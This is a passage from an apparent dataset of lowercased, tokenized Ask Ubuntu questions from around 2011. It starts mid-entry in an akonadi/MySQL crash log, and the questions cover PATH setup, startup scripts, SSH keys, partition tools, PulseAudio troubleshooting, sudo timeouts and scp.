18 : akonadiserver ( ) [ 0x8080b81 ] ] '' processcontrol : application 'akonadiserver ' returned with exit code 255 ( unknown error ) search paths : ( `` /home/patches/bin '' , `` /usr/local/sbin '' , `` /usr/local/bin '' , `` /usr/sbin '' , `` /usr/bin '' , `` /sbin '' , `` /bin '' , `` /usr/games '' , `` /usr/sbin '' , `` /usr/local/sbin '' , `` /usr/local/libexec '' , `` /usr/libexec '' , `` /opt/mysql/libexec '' , `` /opt/local/lib/mysql5/bin '' , `` /opt/mysql/sbin '' ) found mysql_install_db : `` /usr/bin/mysql_install_db '' found mysqlcheck : `` /usr/bin/mysqlcheck '' database process exited unexpectedly during initial connection ! executable : `` /usr/sbin/mysqld-akonadi '' arguments : ( `` -- defaults-file=/home/patches/.local/share/akonadi//mysql.conf '' , `` -- datadir=/home/patches/.local/share/akonadi/db_data/ '' , `` -- socket=/home/patches/.local/share/akonadi/socket-pleistocene/mysql.socket '' ) stdout : `` '' stderr : `` could not open required defaults file : /home/patches/.local/share/akonadi//mysql.conf fatal error in defaults handling . program aborted 110209 16:41:12 [ warning ] ca n't create test file /home/patches/.local/share/akonadi/db_data/pleistocene.lower-test 110209 16:41:12 [ warning ] ca n't create test file /home/patches/.local/share/akonadi/db_data/pleistocene.lower-test 110209 16:41:12 [ note ] plugin 'federated ' is disabled . /usr/sbin/mysqld-akonadi : ca n't find file : './mysql/plugin.frm ' ( errno : 13 ) 110209 16:41:12 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 110209 16:41:12 innodb : operating system error number 13 in a file operation . innodb : the error means mysqld does not have the access rights to innodb : the directory . innodb : file name ./ibdata1 innodb : file operation call : 'create ' . innodb : can not continue operation. '' exit code : 1 process error : `` unknown error '' '' [ 0 : akonadiserver ( _z11akbacktracev+0x35 ) [ 0x8086055 ] 1 : akonadiserver ( ) [ 0x8086516 ] 2 : [ 0xb784e400 ] 3 : [ 0xb784e416 ] 4 : /lib/libc.so.6 ( gsignal+0x51 ) [ 0xb6fbf941 ] 5 : /lib/libc.so.6 ( abort+0x182 ) [ 0xb6fc2e42 ] 6 : /usr/lib/libqtcore.so.4 ( _z17qt_message_output9qtmsgtypepkc+0x8c ) [ 0xb75f62dc ] 7 : akonadiserver ( _zn15filedebugstream9writedataepkcx+0xc4 ) [ 0x8087574 ] 8 : /usr/lib/libqtcore.so.4 ( _zn9qiodevice5writeepkcx+0x8e ) [ 0xb769168e ] 9 : /usr/lib/libqtcore.so.4 ( +0x103425 ) [ 0xb76a1425 ] 10 : /usr/lib/libqtcore.so.4 ( _zn11qtextstreamd1ev+0x3d ) [ 0xb76a295d ] 11 : akonadiserver ( _zn6qdebugd1ev+0x43 ) [ 0x8081b73 ] 12 : akonadiserver ( _zn13dbconfigmysql19startinternalserverev+0x1c27 ) [ 0x810c177 ] 13 : akonadiserver ( _zn7akonadi13akonadiserver20startdatabaseprocessev+0xe3 ) [ 0x8087a23 ] 14 : akonadiserver ( _zn7akonadi13akonadiserverc1ep7qobject+0xca ) [ 0x8088b6a ] 15 : akonadiserver ( _zn7akonadi13akonadiserver8instanceev+0x48 ) [ 0x808a1d8 ] 16 : akonadiserver ( main+0x364 ) [ 0x8080fb4 ] 17 : /lib/libc.so.6 ( __libc_start_main+0xe7 ) [ 0xb6fabce7 ] 18 : akonadiserver ( ) [ 0x8080b81 ] ] '' processcontrol : application 'akonadiserver ' returned with exit code 255 ( unknown error ) '' akonadiserver '' crashed too often and will not be restarted ! i tried moving the ~/.local/share/akonadi folder and running it fresh , and i also tried starting akonadi from a brand new user , all to no avail . requested by @ djeikyb : patches @ pleistocene : ~ $ ls -ld ~/.local drwxrwx -- - 3 patches patches 4096 2011-02-07 03:15 /home/patches/.local patches @ pleistocene : ~ $ mysql_upgrade looking for 'mysql ' as : mysql looking for 'mysqlcheck ' as : mysqlcheck running 'mysqlcheck ' with connection arguments : ' -- port=3306 ' ' -- socket=/var/run/mysqld/mysqld.sock ' mysqlcheck : got error : 2002 : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) when trying to connect fatal error : upgrade failed patches @ pleistocene : ~ $ mysql_upgrade -s ~/.local/share/akonadi/socket-pleistocene/ looking for 'mysql ' as : mysql looking for 'mysqlcheck ' as : mysqlcheck running 'mysqlcheck ' with connection arguments : ' -- port=3306 ' ' -- socket=/var/run/mysqld/mysqld.sock ' ' -- socket=/home/patches/.local/share/akonadi/socket-pleistocene/ ' mysqlcheck : got error : 2002 : ca n't connect to local mysql server through socket '/home/patches/.local/share/akonadi/socket-pleistocene/ ' ( 111 ) when trying to connect fatal error : upgrade failed
25555	is there a folder in my home directory where i should put my scripts so they are available from any directory ?	where should i put my script in my home directory so that i can access it from any directory ? i 've tried : o @ s : ~/ $ echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games but it seems there is no /home/user/ path . the thing is that i 'd like only my user to have access to it so putting it in another directory than my home folder is not an option . should i add something like /home/user/scripts/ to my path variable ? if so , what 's the recommended way to do it ... should i put it in my ~/.bashrc ?
25556	execute script after desktop loaded ?	i want to execute bash script on startup that opens several terminals in different workspaces . script works just fine if i call it from terminal , but it does n't work if executed from crontab using @ reboot : # ! /usr/bin/env bash # 1 make sure we have enough workspaces gconftool-2 -- set -t int /apps/metacity/general/num_workspaces 7 # 2 . launch programs in these terminals wmctrl -s 6 gnome-terminal -- full-screen -- execute bash -c `` tmux attach ; bash '' wmctrl -s 5 gnome-terminal -- full-screen -- execute bash -c `` weechat-curses ; bash '' wmctrl -s 4 gnome-terminal -- full-screen -- execute bash -c `` export term=xterm-256color ; mutt ; bash '' wmctrl -s 3 gnome-terminal -- full-screen wmctrl -s 2 gnome-terminal -- full-screen wmctrl -s 1 gnome-terminal -- full-screen wmctrl -s 0 google-chrome -- start-maximized i think it 's because crontab job triggers before desktop environment is loaded ... maybe ... ? how can i execute this script after desktop environment is loaded ? thanks : ) update 1 : i 've started it from crontab initially like this : @ reboot $ home/andreiscripts/startup.sh > > $ home/andreiscripts/testlog.txt 2 > & 1 and was getting these errors : can not open display . failed to parse arguments : can not open display : can not open display . failed to parse arguments : can not open display : can not open display . ... .. update 2 i 've tried to launch script from system > preferences > startup applications /home/andrei/andreiscripts/startup.sh > > /home/andrei/desktop/out.txt 2 > & 1 but script only opened first gnome-terminal in workspace 6 ... and would n't continue executing the rest of the script until i close that gnome-terminal and so on ... . update 3 - success look for my answer below to see the script that worked in the end .
25560	how do you manage ssh keys ?	i have a server with multiple users which each have multiple authorized ssh keys . is there any effective way ( command line utility ? ) to keep track of which key belongs to who and to quickly remove/add keys ( apart from ssh-copy-id ) ?
25564	partition tool with console ui ( as in server installation ) ?	back in 2006 , ray ( 3dlover ) posted the same question in : http : //ubuntuforums.org/showthread.php ? t=309680 but none of the answers were really useful . now with a little help from askubuntu community , i would like to repeat his question again to see if this time it can be answered correctly . so this is the question ( and what i wish too ) : i 'm looking for a ui tool for managing partitions in a console . i have installed ubuntu server , so i do n't have x windows at all . fdisk and sfdisk are entirely command line . parted is slightly better , but it's not really a ui . cfdisk has somewhat of a ui , but it only works on one disk at a time , and there 's no advanced options like configuring lvm or raid . just partitioning . i love the partition tool that is available during the os install procedure . you can partition , configure raid 's and lmv sets . it can format the partitions with several different file systems , it can set labels , mount options and it can insert your volumes into your fstab . is this tool available as a stand-alone program ? i ca n't find it anywhere . i think it's called parted_server , but i ca n't find much information about where to get it . in the past , i have run the ubuntu install procedure just to use the partition manager that comes with it . ( canceling the install after making my partition edits ) anyone help me on this ? thanks -ray thanks in advance . [ update ] use case : i manage some servers ( dedicated rental service ) in which i have no physical access to them ( so no cd option ) with multiple hdds . i would like to be able to manage those drives ( partition , raid , lmv , etc ) , in exactly the same way i do when i install ubuntu server edition in any other server ( using the installation cd ) . the installation cds comes with that application , and i 'm sure there should be a way to be able to install and execute that application in a running system ( without requiring the cds ) .
25565	why ca n't i find gnomad2 in the repositories ?	i 've tried and tried , but i just ca n't seem to find gnomad2 ( http : //ubuntuforums.org/showthread.php ? t=93810 ) in the ubuntu repositories . i 've already enabled all the `` categories '' in software sources ( except source code ) , and i 've `` reloaded '' ( apt-get update ) the repositories several times already . i feel like i 'm doing something really stupid though ...
25566	thunderbird autofill : also look for domain names	in the past , i could compose an e-mail in thunderbird , and in the to field write '' icecream '' and then my contact john @ the icecream factory.com - to given an example - would show up . not anymore . tb only looks for names and the first part of e-mail addresses . any idea what can be done ? using ubuntu 10.10 , tb 3.1.7 .
25571	how can i get the creative zen touch to work ?	i 've tried using gnomad2 ( too lazy to configure all the dependencies ) and amarok ( segfaulted when i tried to do anything with it ) . $ lsusb bus 002 device 004 : id 041e:4131 creative technology , ltd zen touch ( mtp ) # snip output # $ lsusb -- verbose -s 002:004 bus 002 device 004 : id 041e:4131 creative technology , ltd zen touch ( mtp ) device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 255 vendor specific class bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x041e creative technology , ltd idproduct 0x4131 zen touch ( mtp ) bcddevice 1.00 imanufacturer 1 creative technology ltd iproduct 2 creative zen touch iserial 3 010125517d039098 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 39 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 16 configuration 1 bmattributes 0xc0 self powered maxpower 440ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 3 binterfaceclass 0 ( defined at interface level ) binterfacesubclass 0 binterfaceprotocol 0 iinterface 33 mtp interface endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 4 device qualifier ( for other device speed ) : blength 10 bdescriptortype 6 bcdusb 2.00 bdeviceclass 255 vendor specific class bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 bnumconfigurations 1 ca n't get debug descriptor : connection timed out device status : 0x0000 ( bus powered )
25573	why do i need lib64 on my 32 bit machine ?	i am trying to install oracle on my 32-bit machine that runs ubuntu 10.4 . i am following install oracle on ubuntu tutorial . at the very first step there is a requirement to manually install library libstdc++5 . author does 2 steps : download libstdc++5_3.3.6-17ubuntu1_amd64.deb from here download ia32-libs_2.7ubuntu6.1_amd64.deb from here as you may have probably noticed these 2 files contain an `` _amd64 '' postfix , which pointed me out that author is using 64-bit amd processor . each of these files author copied to /usr/lib64 and /usr/lib32 folders correspondingly and simply make soft links libstdc++.so.5 in both folders . since i am running 32-bit machine i have simply downloaded those 2 files without `` _amd64 '' postfix . unexpectedly for me i have also found 2 lib folders in my /usr folder : /usr/lib64 and /usr/lib . so here is my problem : i do not understand which files and where do i have to copy : 1 ) do i have to make the same steps as the author has done , i.e . download files with `` _amd64 '' postfixes and place them in my /usr/lib64 and /usr/lib folders ? 2 ) or do i have to use libraries without `` _amd64 '' postfix ? and one more question : why do i have /usr/lib64 at all ?
25575	racing mmo - 2d or 3d - massively multiplayer online racing games	i really like multiplayer racing games , like need for speed world or similar . i wonder if there is any mmo racing game for ubuntu ( 2d or 3d ) . browser-based games are also accepted . note : i tried this question in the gaming q & a of stackexchange ( see link below ) , but one user said that my question was off-topic . http : //gaming.stackexchange.com/questions/16329/racing-mmo-for-linux-2d-or-3d-massively-multiplayer-online-racing-games
25581	how can i have 1 image stretch across multiple workspaces ?	basically , i have a quad-monitor wallpaper that i want to stretch across all of my workspaces ( 1 monitor ) , i have compiz manager installed , but ca n't seem to get the single image to fill the entire cube . how should i go about this ?
25585	is it possible to get emesene to work with memenu ?	is it possible to ? or is it an emesene problem ? , is there a plug in or a workaround ?
25590	how do you fix file permissions for root directory ?	what is the best way to fix ubuntu 's root file system permissions ? i was changing file permissions on a whole bunch of files that needed to be removed , i had accidentally changed the permissions for / , /etc , /var , /home , /bin , /media and all the files underneath . majority of them were changed to 0777 . all this because i added a space to chmod command that i was running . now i am running into issues with stuff not working correctly and unable to log into root with either su or sudo . so administration from the desktop is not possible , and trying to get into grubs os selection is also impossible because last upgrade for some reason turned it off the menu when it boots . any kind of admin action is nearly impossible to do because of this . is there a script i can run in the root shell that will fix it or should i just re-install ubuntu ? are there any other things that i can do to fix this other then changing each directory and file to the correct permissions ? i am currently running ubuntu 10.10 64bit
25591	why does sudo ask for a password in window after i 've just authenticated in a different one ?	if i am using the command line in xterm , gnome-terminal , etc. , i can keep sudo from re-prompting for a password , within some limits , or i can disable it . as a compromise between usability and security , i usually just want this re-querying wait-time lengthened . by default , there is only a 15 minute grace-period after entering a sudo password before it prompts for it again . to change this to 45 minutes , i can edit /etc/sudoers , and set timestamp_timeout to the waiting period i want ( in minutes ) . if i am within the same terminal session , and start a new shell ( typing in csh or bash ) the wait period is respected . but if i go to another window to access the command line there , it will immediately ask for my password if i try to sudo . within the same pseudoterminal session ( pts ) ( for example , if i spawn a new shell inside the same gnome-terminal window ) , the timeout is respected . if i launch a new xterm , gnome-terminal , etc. , i must enter credentials again . despite being the only user active on my home system ( a single-user system ) , etc. , sudo does n't trust that all of my pts entries are from the same user : ~/pseudoland $ w 01:27:39 up 1 day , 15:03 , 7 users , load average : 0.32 , 0.71 , 0.77 user tty from login @ idle jcpu pcpu what jgb tty1 23:56 1:30m 0.55s 0.51s -bash jgb tty7 :0 tue10 39:03m 2:28m 0.76s gnome-session root pts/1 :0.0 00:30 56:23 0.01s 0.01s /bin/bash jgb pts/3 :0.0 01:16 0.00s 0.59s 3.22s gnome-terminal jgb pts/4 :0.0 01:27 26.00s 0.23s 0.23s /bin/bash jgb pts/5 :0.0 01:17 9:26 0.23s 0.23s bash is there a way to tell sudo that it should regard all the windows i open as coming from the same user , and to not ask again for my password if the last sudo timer has n't expired ?
25596	how to set up usb for virtualbox ?	i 'm using ubuntu maverick and virtual box 3+ and i installed window 7 ultimate editon . the problem is that it does n't detect usb drives on window 7 but usb peripherals ( mouse + keybord ) are working . i followed this instruction , but i ca n't find the user group vboxusers . how can i continue ? i would also like to upgrade to the latest version without any risk ( without losing my virtual hard disk drive ) .
25597	using a displaylink usb video adapter	i just bought this usb graphics adapter and i need to use it on ubuntu 10.10 . i followed this guide , but when i ran $ ./configure & & sudo make install & & make check nothing happened . on windows , after the installation the monitor was detected automatically . how do i get it to work on ubuntu ?
25599	get wget output to a variable	how can i do it ? i am trying it like this result=`wget $ url` p.s . - also any recommended sources for learning shell scripting ?
25602	is there a bittorrent client which has an embedded tracker ?	bittorrent trackers are a bit of a mystery to me , but i do recall ( a couple of years ago ) that i managed to set up a ms window bittorrent client ( utorrent ) to make a private .torrent and then manage it ( privately ) ... i 'd like to do the same with a linux/ubuntu program ... and i 'd prefer to stay with upuntu repository options . i want to be the tracker.. ( not just make a `` private '' .torrent ) update : in 'deluge ' terminology , it is called an embedded tracker ( but deluge does n't have one )
25604	monitor blinking	i have ubuntu 10.04 , my laptop is asus k50ij , intel duo t3000 , 2gb ram , 320 hdd , intel gma 4500m video card . my problem is that a couple days ago my monitor had start blinking for a few seconds . then it stops and begins the same behaviour let 's say in next 2 hours . what am i missing here ? another funny problem is that when i give more or less brightness to monitor the pop up window shows and giving `` power information : laptop battery is charged '' . when my brightness is lower the blinking increases and vice versa . thx for help
25605	how can i get tab-completion in the interactive python interpreter ?	i often use python 3000 's interactive interpreter , but it 's missing the convenience of tab-completion i 'm used to from ipython , which is n't available for python 3.x . how do i enable tab completion in all of them , 2.6 and 3.x ?
25609	remote desktop similar to teamviewer ?	i 'm looking for an application similar to teamviewer to install on ubuntu 10.10 . i know that the teamviewer 's staff has released a version for ubuntu , but i 'd like to use something completely open . someone can help me ?
25616	securing facebook	probably like most of you , i am concerned about the privacy of facebook . some people suggested that i use the https address instead . unfortunately , many links in the https page itself link back to http . so i am wondering whether it is possible in ubuntu to redirect any request to : http : //www.facebook.com/ to https : //www.facebook.com/ this way i feel safer . if you also know the solution for windows , it might be great to share ( probably as a comment to my question rather than answer , as this forum is supposed to be for ubuntu ) so that i can share it with friends .
25617	can i restore a content of the clipboard after restart ?	i have copied an important piece of some text into a clipboard from an external memory card . occasionally , i have forgotten to paste this info into a local file and i have then switched the system off . can i restore a content of the clipboard after system restart ?
25621	how do i import existing ssh keys into seahorse ?	is there a way to import existing ssh keys to seahorse ?
25622	my sound stopped working today , how can i fix it ?	this seems to be a problem with pulseaudio . i was logged in over vnc on my phone and started playing a video this caused x to crash ( as sometimes happens ) . i restarted and suddenly the sound does n't work . i have a intel hda/realtek alc889 00:1b.0 audio device : intel corporation 82801ji ( ich10 family ) hd audio controller alsamixer is detecting this just fine . pulseaudio does n't detect this alsa device so is using auto_null as the default sink ( logs below ) . when i properly kill pulseaudio ( tell it not to auto-start ) direct alsa communication with the sound card works just fine . speaker-test , for example , works . so the hardware and alsa layers are fine imo . in the logs , it seems that the card might be `` busy '' but i really do n't know how or why it would be now ( and never before ) . is there an alsa lock file somewhere that it still there because of my crash ? i just ran sudo fuser /dev/snd/* and saw this : oli @ bert : ~ $ sudo fuser /dev/snd/* /dev/snd/controlc0 : 1884 /dev/snd/pcmc0d0c : 1884m /dev/snd/timer : 1884 a look at the process list ( ps aux | grep 1884 ) tells me process 1884 is arecord -c 1 -f s16_le -r 8000 -t raw . no idea what this is or why it 's running . when i try and kill arecord ( as root ) , it just respawns and rebinds on the hardware . i 'm in a very annoying situation where i do n't know what is going on and do n't know how to find out . i 'm open to all suggestions to get this working again . fire away . and here 's what i get when i stop pa auto-loading , kill it and then start it with -vvvv . oli @ bert : ~ $ pulseaudio -vvvvv i : main.c : setrlimit ( rlimit_nice , ( 31 , 31 ) ) failed : operation not permitted i : main.c : setrlimit ( rlimit_rtprio , ( 9 , 9 ) ) failed : operation not permitted d : core-rtclock.c : timer slack is set to 50 us . d : core-util.c : realtimekit worked . i : core-util.c : successfully gained nice level -11 . i : main.c : this is pulseaudio 0.9.21-63-gd3efa-dirty d : main.c : compilation host : x86_64-pc-linux-gnu d : main.c : compilation cflags : -g -o2 -g -wall -o3 -wall -w -wextra -pipe -wno-long-long -winline -wvla -wno-overlength-strings -wunsafe-loop-optimizations -wundef -wformat=2 -wlogical-op -wsign-compare -wformat-security -wmissing-include-dirs -wformat-nonliteral -wold-style-definition -wpointer-arith -winit-self -wdeclaration-after-statement -wfloat-equal -wmissing-prototypes -wstrict-prototypes -wredundant-decls -wmissing-declarations -wmissing-noreturn -wshadow -wendif-labels -wcast-align -wstrict-aliasing=2 -wwrite-strings -wno-unused-parameter -ffast-math -wp , -d_fortify_source=2 -fno-common -fdiagnostics-show-option d : main.c : running on host : linux x86_64 2.6.38-rc3 # 1 smp tue feb 1 10:53:04 gmt 2011 d : main.c : found 8 cpus . i : main.c : page size is 4096 bytes d : main.c : compiled with valgrind support : no d : main.c : running in valgrind mode : no d : main.c : running in vm : no d : main.c : optimised build : yes d : main.c : all asserts enabled . i : main.c : machine id is 8310740c4729ef474fe5ecec4bbf5a6b . i : main.c : session id is 8310740c4729ef474fe5ecec4bbf5a6b-1297338553.571075-1050119523 . i : main.c : using runtime directory /home/oli/.pulse/8310740c4729ef474fe5ecec4bbf5a6b-runtime . i : main.c : using state directory /home/oli/.pulse . i : main.c : using modules directory /usr/lib/pulse-0.9.21/modules . i : main.c : running in system mode : no i : main.c : fresh high-resolution timers available ! enjoy ol ' chap ! i : cpu-x86.c : cpu flags : cmov mmx sse sse2 sse3 ssse3 sse4_1 sse4_2 i : svolume_mmx.c : initialising mmx optimized functions . i : remap_mmx.c : initialising mmx optimized remappers . i : svolume_sse.c : initialising sse2 optimized functions . i : remap_sse.c : initialising sse2 optimized remappers . i : sconv_sse.c : initialising sse2 optimized conversions . d : memblock.c : using shared memory pool with 1024 slots of size 64.0 kib each , total size is 64.0 mib , maximum usable slot size is 65472 d : database-tdb.c : opened tdb database '/home/oli/.pulse/8310740c4729ef474fe5ecec4bbf5a6b-device-volumes.tdb' i : module-device-restore.c : sucessfully opened database file '/home/oli/.pulse/8310740c4729ef474fe5ecec4bbf5a6b-device-volumes ' . i : module.c : loaded `` module-device-restore '' ( index : # 0 ; argument : `` '' ) . d : database-tdb.c : opened tdb database '/home/oli/.pulse/8310740c4729ef474fe5ecec4bbf5a6b-stream-volumes.tdb' i : module-stream-restore.c : sucessfully opened database file '/home/oli/.pulse/8310740c4729ef474fe5ecec4bbf5a6b-stream-volumes ' . i : module.c : loaded `` module-stream-restore '' ( index : # 1 ; argument : `` '' ) . d : database-tdb.c : opened tdb database '/home/oli/.pulse/8310740c4729ef474fe5ecec4bbf5a6b-card-database.tdb' i : module-card-restore.c : sucessfully opened database file '/home/oli/.pulse/8310740c4729ef474fe5ecec4bbf5a6b-card-database ' . i : module.c : loaded `` module-card-restore '' ( index : # 2 ; argument : `` '' ) . i : module.c : loaded `` module-augment-properties '' ( index : # 3 ; argument : `` '' ) . d : cli-command.c : checking for existance of '/usr/lib/pulse-0.9.21/modules/module-udev-detect.so ' : success d : module-udev-detect.c : /dev/snd/controlc0 is accessible : yes d : module-udev-detect.c : /devices/pci0000:00/0000:00:1b.0/sound/card0 is busy : yes i : module-udev-detect.c : found 1 cards . i : module.c : loaded `` module-udev-detect '' ( index : # 4 ; argument : `` '' ) . d : cli-command.c : checking for existance of '/usr/lib/pulse-0.9.21/modules/module-bluetooth-discover.so ' : success d : dbus-util.c : successfully connected to d-bus system bus ba7c9a1f90b3d49d930bca2100000015 as :1.62 d : bluetooth-util.c : dbus : interface=org.freedesktop.dbus , path=/org/freedesktop/dbus , member=nameacquired d : bluetooth-util.c : bluetooth daemon is apparently not available . i : module.c : loaded `` module-bluetooth-discover '' ( index : # 5 ; argument : `` '' ) . d : cli-command.c : checking for existance of '/usr/lib/pulse-0.9.21/modules/module-esound-protocol-unix.so ' : success i : module.c : loaded `` module-esound-protocol-unix '' ( index : # 6 ; argument : `` '' ) . i : module.c : loaded `` module-native-protocol-unix '' ( index : # 7 ; argument : `` '' ) . d : cli-command.c : checking for existance of '/usr/lib/pulse-0.9.21/modules/module-gconf.so ' : success i : module.c : loaded `` module-gconf '' ( index : # 8 ; argument : `` '' ) . i : module-default-device-restore.c : saved default sink 'auto_null ' not existant , not restoring default sink setting . i : module-default-device-restore.c : saved default source 'auto_null.monitor ' not existant , not restoring default source setting . i : module.c : loaded `` module-default-device-restore '' ( index : # 9 ; argument : `` '' ) . i : module.c : loaded `` module-rescue-streams '' ( index : # 10 ; argument : `` '' ) . d : module-always-sink.c : autoloading null-sink as no other sinks detected . i : sink.c : created sink 0 `` auto_null '' with sample spec s16le 6ch 44100hz and channel map front-left , front-left-of-center , front-center , front-right , front-right-of-center , rear-center i : sink.c : device.description = `` dummy output '' i : sink.c : device.class = `` abstract '' i : sink.c : device.icon_name = `` audio-card '' d : core-subscribe.c : dropped redundant event due to change event . i : source.c : created source 0 `` auto_null.monitor '' with sample spec s16le 6ch 44100hz and channel map front-left , front-left-of-center , front-center , front-right , front-right-of-center , rear-center i : source.c : device.description = `` monitor of dummy output '' i : source.c : device.class = `` monitor '' i : source.c : device.icon_name = `` audio-input-microphone '' d : module-null-sink.c : thread starting up i : module.c : loaded `` module-null-sink '' ( index : # 11 ; argument : `` sink_name=auto_null sink_properties='device.description= '' dummy output '' ' '' ) . i : module.c : loaded `` module-always-sink '' ( index : # 12 ; argument : `` '' ) . i : module.c : loaded `` module-intended-roles '' ( index : # 13 ; argument : `` '' ) . d : module-suspend-on-idle.c : sink auto_null becomes idle , timeout in 5 seconds . i : module.c : loaded `` module-suspend-on-idle '' ( index : # 14 ; argument : `` '' ) . i : client.c : created 0 `` consolekit session /org/freedesktop/consolekit/session1 '' d : module-console-kit.c : added new session /org/freedesktop/consolekit/session1 i : module.c : loaded `` module-console-kit '' ( index : # 15 ; argument : `` '' ) . i : module.c : loaded `` module-position-event-sounds '' ( index : # 16 ; argument : `` '' ) . d : dbus-util.c : successfully connected to d-bus session bus efbffc6788fad56cfd64d40c00000018 as :1.182 d : main.c : got org.pulseaudio.server ! i : main.c : daemon startup complete . i : client.c : created 1 `` native client ( unix socket client ) '' i : client.c : created 2 `` native client ( unix socket client ) '' d : protocol-native.c : protocol version : remote 16 , local 16 i : protocol-native.c : got credentials : uid=1000 gid=1000 success=1 d : protocol-native.c : shm possible : yes d : protocol-native.c : negotiated shm : yes d : protocol-native.c : protocol version : remote 16 , local 16 i : protocol-native.c : got credentials : uid=1000 gid=1000 success=1 d : protocol-native.c : shm possible : yes d : protocol-native.c : negotiated shm : yes d : module-augment-properties.c : looking for .desktop file for gnome-volume-control-applet d : module-augment-properties.c : looking for .desktop file for gnome-settings-daemon d : core-subscribe.c : dropped redundant event due to change event . i : module-suspend-on-idle.c : sink auto_null idle for too long , suspending ... d : sink.c : suspend cause of sink auto_null is 0x0004 , suspending note the one section that seems to find the hardware but says it 's busy ( no idea if this is relevant ) . d : cli-command.c : checking for existance of '/usr/lib/pulse-0.9.21/modules/module-udev-detect.so ' : success d : module-udev-detect.c : /dev/snd/controlc0 is accessible : yes d : module-udev-detect.c : /devices/pci0000:00/0000:00:1b.0/sound/card0 is busy : yes i : module-udev-detect.c : found 1 cards .
25623	how can i make a live cd/dvd from my harddisk installation ?	how can i make a live cd/dvd from my harddisk installation ? in other words , i would like to create a boot cd from ubuntu that is installed on my pc , because i want to include the updated packages in it . is it possible ?
25628	how to distort images	is it possible to distort an image with open source software on ubuntu ? i know i can skew and stretch , but how can i do something like this ? basically , imagine all those images being a single png file , how would i give it that curved effect ?
25633	how to migrate user settings and data to new machine ?	i 'm new to ubuntu and recently started using it on my pc . i 'm going to replace that pc with a new machine . i want to transfer my data and settings to the nettop . what aspects should i consider ? obviously i want to move my data over . what things am i missing if i only copy the entire home folder ? this is a home pc ( not corporate ) so user rights and other security issues are not a concern , except that the files should be accessible on the new machine ! please take into account that the new machine is a nettop that does n't have an optical drive and does n't allow me to hook the old sata disk into it , so any data transfer must be handled via home network ( i can have both the old and the new machine turned on and connected to the home lan ) and i have an usb thumbdrive with limited capacity ( 2gb ) . this sounds like it might limit the general applicability , but it would in fact make it more general . i 'll make this a wiki topic because there could be several `` right '' answers . update : or so i thought . i do n't see a choice for that .
25635	running a webbrowser on the screen saver or login screen ?	i would really like people to be able to use my locked computer to surf , so i would like some way to run a browser on login screen . so can i make gdm run firefox in some way ? it would be cooler if i could have a browser as a screensaver , but that seems a bit harder . please ignore all the security problems with this , if you let someone use your computer you have lost that race anyways . though of course it would be nice to have a browser running as another user .
25639	how to avoid openssh showing authentication popup ?	when pushing a bzr repo to another server , i need to type an openssh password . after i typed it , an openssh popup appears , and requires the password again . any way to avoid this ?
25643	how do i sync evolution 's `` sent '' folder ?	is there any way to sync the sent folder in evolution in ubuntu one ? received items are updated from the mail server as i leave them there 7 days before deletion , but i need to keep my sent items on each computer too .
25644	which window has current focus ?	i 'd like to know ( programmatically ) which window has current focus . is there a window-manager independent way of discovering that ? otherwise , how does one determine which window has focus in compiz or metacity ?
25646	how do i grep in the content of a string variable ?	how to do a grep in a variable ? i have stored the wget output in a variable and i need to extract out some strings from it . like the content of the variable is upgrade http : //wordpress.org/download/ http : //wordpress.org/wordpress-3.0.5.zip 3.0.5 en_us 4.3 4.1.2 i need to check if the string contains the word upgrade , so i can do a simple grep and then check the exit status of it by $ ? and proceed . how can i get the value 3.0.5 which is actually the fourth word ? and how to actually grep in a variable ?
25648	is it possible to find out what options packages were compiled with ?	i am interested in knowing which options are used to compile vim in the package `` vim '' as i am trying to compile vim from source on another system , not running debian/ubuntu , and would like it to work in a similar way .
25651	bash scripts will not run without typing `` bash '' in front of it	on our school system , we 're able to run script files without typing bash or csh or what have you without indicating what script type it is . on ubuntu , however , i 'm required to type bash script.bash for example . is this always necessary in ubuntu , or is it some setting i can change ?
25655	why does n't this wildcard work the way i expect ?	on my user folder , i have folders like d ropbox , d ocuments , d ownloads & d ump . ls a* should list all the files whose name starts with a . right ? but when i gives the command ls d* , instead of just displaying dump it shows me the ls of dump directory . and when i gives the command as ls d* , then it displays ls of all foldes starting with d so what part did i miss in understand it ? edit : attaching a screenshot
25661	scp not working with a .ppk key	so i need to connect to a remote server . remote server is running debian , i am on ubuntu lucid -- and a noob in ssh . i need a public key to connect to the remote server . the key has been created as a putty pageant file ( .ppk ) . i used putty-tools to convert the .ppk key to linux files ( namely , id_rsa and id_rsa.pub ) . ssh works okay , but when i try to scp a file terminal says : # scp -p 52 /path/to/local/file user @ host.com : /path/to/remote/file permission denied ( publickey ) . lost connection also , it 's not working using sftp with filezilla : command : trust new hostkey : once error : could not connect to server how come it 's working with ssh and not scp ? thanks ! edit : it 's working now ! not really sure why ... how is that passphrase system working with ssh ? does it keep the passphrase in th terminal 's memory ? this time i 've connected to ssh in one terminal tab . i was prompted my passphrase , entered it and got in . then on another terminal tab , i tried to scp a file and i 've been asked the passphrase and it worked ! ... .
25664	which mpi package should i install ?	i want to attempt some simple programs using mpi on my desktop which runs kubuntu 10.04.2 . which mpi package should i install ?
25668	can you install ubuntu from the hard disk ?	is it possible to install ubuntu from the hard disk ?
25670	is there any way to make the window resizing less sensitive ?	possible duplicates : how do i increase resize margin on windows ? why are window borders so hard to click in ambiance ? it seems like it 's very difficult on this computer to get the mouse right at the corner of a window so that i can resize it . my other box seems much less sensitive . is there a way to change that setting ?
